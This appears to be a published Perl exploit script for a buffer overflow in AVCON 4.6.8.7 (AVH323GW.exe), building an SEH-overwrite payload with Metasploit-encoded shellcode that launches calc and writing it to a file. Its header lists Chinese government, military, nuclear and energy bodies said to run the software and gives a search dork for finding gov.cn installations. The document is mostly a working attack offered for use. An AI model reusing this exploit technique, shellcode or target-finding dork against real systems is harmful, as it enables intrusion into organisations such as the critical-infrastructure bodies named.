AVCON Buffer Overflow
=====================
AVCON Buffer Overflow
=====================

#!/usr/bin/perl
# Exploit Title: AVCON Buffer Overflow
# Date: 5/7/10
# Author: Dillon Beresford
# URL: http://www.avcon.com.cn/
# Version: 4.6.8.7
# Tested on: XP SP2 and SP3
# CVE : NONE
# Code : exploit.pl
# Twitter: http://twitter.com/D1N
# Dork: site:gov.cn "AVCON"
# There are other bugs... This is just for fun ;-)
# Paste the output from exploit.txt into AVH323GW.exe
# Enjoy the wang chung++ and look for the other bugs. ;)
# 2 products from China and 2 0days in one month dizam!
# Okay so who uses AVCON4 and why is it so important?
# China's State Grid
# China's State Information Center
# China's Customs armed police
# China's Shenyang Military Region
# China's Yunnan Frontier Corps
# China's Nuclear Agencies
# China Life Insurance Company
# China Pacific Insurance Group
# China National Petroleum Corporation
# Daqing Oilfield Material Group
# Grace Pai Henan Electric Power
# China Civil Aviation Information Group
# China Southern Airlines Co., Ltd.
# Shenzhen International Trust
# National Grain and Oil Information Center
# Anyang City of Henan Province E
# Guangdong Food and Drug Administration

## EDB Test Notes:
## Software can be installed as English. Once installed, go to "Start" -> "AVCON4" ->
## run "AVH323GW.exe", copy and paste the exploit (string) to the input field (there's only one),
## and click on "call".

my $exploit = "poc.txt";
my $junk = "\x41" x 1019;
my $nSEH = "\xeb\x06\x90\x90"; # jmp 6 bytes
my $SEH = pack('V',0x200504B4); # pop pop ret

# windows/exec - 218 bytes
# http://www.metasploit.com
# Encoder: x86/fnstenv_mov
# EXITFUNC=seh, CMD=calc
my $buf =
"\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc4" .
"\xd2\xe5\x7b\x83\xeb\xfc\xe2\xf4\x38\x3a\x6c\x7b\xc4\xd2" .
"\x85\xf2\x21\xe3\x37\x1f\x4f\x80\xd5\xf0\x96\xde\x6e\x29" .
"\xd0\x59\x97\x53\xcb\x65\xaf\x5d\xf5\x2d\xd4\xbb\x68\xee" .
"\x84\x07\xc6\xfe\xc5\xba\x0b\xdf\xe4\xbc\x26\x22\xb7\x2c" .
"\x4f\x80\xf5\xf0\x86\xee\xe4\xab\x4f\x92\x9d\xfe\x04\xa6" .
"\xaf\x7a\x14\x82\x6e\x33\xdc\x59\xbd\x5b\xc5\x01\x06\x47" .
"\x8d\x59\xd1\xf0\xc5\x04\xd4\x84\xf5\x12\x49\xba\x0b\xdf" .
"\xe4\xbc\xfc\x32\x90\x8f\xc7\xaf\x1d\x40\xb9\xf6\x90\x99" .
"\x9c\x59\xbd\x5f\xc5\x01\x83\xf0\xc8\x99\x6e\x23\xd8\xd3" .
"\x36\xf0\xc0\x59\xe4\xab\x4d\x96\xc1\x5f\x9f\x89\x84\x22" .
"\x9e\x83\x1a\x9b\x9c\x8d\xbf\xf0\xd6\x39\x63\x26\xae\xd3" .
"\x68\xfe\x7d\xd2\xe5\x7b\x94\xba\xd4\xf0\xab\x55\x1a\xae" .
"\x7f\x2c\xeb\x49\x2e\xba\x43\xee\x79\x4f\x1a\xae\xf8\xd4" .
"\x99\x71\x44\x29\x05\x0e\xc1\x69\xa2\x68\xb6\xbd\x8f\x7b" .
"\x97\x2d\x30\x18\xa5\xbe\x86\x7b";

my $padding = "\x90" x 5000; # padding
my $payload = $junk.$nSEH.$SEH.$buf.$padding;

open (myfile,">$exploit");
print myfile $payload;
close (myfile);

# 0day.today [2024-12-26] #